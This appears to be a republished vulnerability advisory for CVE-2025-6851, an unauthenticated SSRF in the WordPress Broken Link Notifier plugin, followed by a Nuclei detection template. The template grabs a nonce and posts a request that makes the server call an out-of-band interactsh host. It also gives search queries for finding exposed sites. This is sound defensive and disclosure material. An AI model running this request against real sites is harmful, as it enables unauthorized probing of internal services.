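WordPress Broken Link Notifier Server-Side Request Forgery Vulnerability

Vulnerability Information

Vulnerability name: WordPress Broken Link Notifier Server-Side Request Forgery Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-6851

Vulnerability type: Server-Side Request Forgery

Severity: High

Description: The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in all versions up to and including 1.3.0. The flaw arises because check_url_status_code(), which is ultimately called by ajax_blinks(), does not sufficiently validate the user-supplied URL, so an unauthenticated attacker can make the server issue web requests to arbitrary locations. Such requests can be used to query and modify information from internal services, which may lead to sensitive data disclosure or service disruption. Because the vulnerability can be exploited without authentication and can be automated, it poses a serious security threat to WordPress sites that use the plugin. Affected users should upgrade immediately to version 1.3.1 or later to fix the vulnerability.

Vendor: WordPress

Product: Broken Link Notifier

Affected versions: version <= 1.3.0

Search syntax: body="blnotifier_front_end"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/dc96d101fcb7644d50cf080f65f53b5ca7e39c47/http%2Fcves%2F2025%2FCVE-2025-6851.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details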

id: CVE-2025-6851

info:
  name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
  remediation: Fixed in 1.3.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6851
    - https://wpscan.com/vulnerability/CVE-2025-6851
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-notifier/broken-link-notifier-130-unauthenticated-server-side-request-forgery
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/broken-link-notifier/"
    fofa-query: body="blnotifier_front_end"
  tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'blnotifier_front_end')
        internal: true

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'blnotifier_front_end.*"nonce":"(.*?)"'

  - raw:
      - |-
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        action=blnotifier_blinks&nonce={{nonce}}&source_url=http://test&header_links[]=http://{{interactsh-url}}&

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'notify', 'timing', 'Results were generated in')
          - status_code == 200
        condition: and



http://example.com/2025/07/15/github_3769171926/
Author: lianccc
Published: July 15, 2025
License